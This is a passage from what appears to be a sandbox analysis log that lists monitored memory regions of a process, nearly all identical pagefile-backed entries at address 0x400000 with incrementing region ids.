0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10052 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10053 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10056 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10057 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10059 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10060 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10061 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10063 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10064 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10065 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10068 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10069 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10072 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10073 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10076 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10077 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10080 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10081 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10084 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10085 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10088 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10089 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10092 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10093 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10094 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10095 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10096 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10097 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10098 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10099 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10100 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10101 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10102 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10103 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10104 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10105 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10106 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10107 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10108 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10109 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10110 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10111 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10112 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10113 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10114 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10115 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10116 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10117 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10118 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10119 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10120 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10121 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10122 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10123 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10124 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10125 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10127 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10128 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10129 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10131 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10132 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10133 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10135 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10136 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10137 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10139 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10140 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10143 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10144 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10145 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10147 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10148 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10149 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10151 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10152 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10153 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10154 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10155 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10156 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10157 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10158 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10159 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10160 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10161 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10162 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10163 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10164 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10165 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10166 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10167 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10168 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10169 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10170 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10171 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10172 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10173 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10174 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10175 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10176 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10177 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10178 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10179 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10180 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10181 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10182 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10183 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10184 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10185 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10186 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10187 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10188 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10189 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10190 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10191 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10192 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10193 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10194 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10195 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10196 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10197 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10198 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10199 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10200 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10201 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10202 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10203 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10204 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10205 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10206 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10207 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10208 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10209 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10210 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10211 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10212 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10213 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10214 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10215 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10216 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10217 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10218 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10219 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10220 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10221 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10222 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10223 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10224 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10225 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10226 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10227 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10228 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10229 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10230 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10231 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10232 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10233 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10234 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10235 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10236 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10237 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10238 start_va = 0x2270000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002270000" filename = "" Region: id = 10239 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 10240 start_va = 0x400000 end_va = 0x40efff monitored = 